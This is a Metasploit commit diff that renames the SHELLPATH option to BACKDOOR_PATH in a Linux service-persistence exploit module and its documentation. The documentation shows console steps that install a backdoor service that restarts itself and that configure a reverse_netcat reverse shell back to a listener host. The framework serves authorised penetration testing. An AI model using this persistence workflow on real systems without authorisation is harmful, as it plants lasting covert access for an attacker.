rapid7 · cdelafuente-r7 · Feb 14, 2024 · Feb 3, 2024
diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md
@@ -39,7 +39,7 @@
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
 3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
 
-**SHELLPATH**
+**BACKDOOR_PATH**
 
   If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
 
@@ -72,15 +72,15 @@ Get initial access
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
 
-Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
+Install our callback service (system_v w/ chkconfig).  Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.
 
     msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
     msf exploit(service_persistence) > set session 1
     session => 1
     msf exploit(service_persistence) > set verbose true
     verbose => true
-    msf exploit(service_persistence) > set SHELLPATH /bin
-    SHELLPATH => /bin
+    msf exploit(service_persistence) > set BACKDOOR_PATH /bin
+    BACKDOOR_PATH => /bin
     msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
     payload => cmd/unix/reverse_netcat
     msf exploit(service_persistence) > set lhost 192.168.199.128
@@ -260,12 +260,12 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
 
     Module options (exploit/linux/local/service_persistence):
 
-       Name        Current Setting  Required  Description
-       ----        ---------------  --------  -----------
-       SERVICE                      no        Name of service to create
-       SESSION     -1               yes       The session to run this module on.
-       SHELLPATH   /tmp             yes       Writable path to put our shell
-       SHELL_NAME                   no        Name of shell file to write
+      Name           Current Setting  Required  Description
+      ----           ---------------  --------  -----------
+      BACKDOOR_PATH  /tmp             yes       Writable path to put our shell
+      SERVICE                         no        Name of service to create
+      SESSION                         yes       The session to run this module on
+      SHELL_NAME                      no        Name of shell file to write
 
 
     Payload options (cmd/unix/reverse_netcat):

diff --git a/modules/exploits/linux/local/service_persistence.rb b/modules/exploits/linux/local/service_persistence.rb
@@ -46,27 +46,27 @@ def initialize(info = {})
           [
             ['Auto', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['System V', :runlevel => '2 3 4 5', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['Upstart', :runlevel => '2345', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['systemd', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['systemd user', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/tmp'
+                'BACKDOOR_PATH' => '/tmp'
               }
             ]
           ],
@@ -94,7 +94,7 @@ def initialize(info = {})
 
     register_options(
       [
-        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
+        OptPath.new('BACKDOOR_PATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
         OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
         OptString.new('SERVICE', [false, 'Name of service to create'])
       ]
@@ -107,7 +107,7 @@ def initialize(info = {})
   end
 
   def exploit
-    backdoor = write_shell(datastore['SHELLPATH'])
+    backdoor = write_shell(datastore['BACKDOOR_PATH'])
     if backdoor.nil?
       return
     end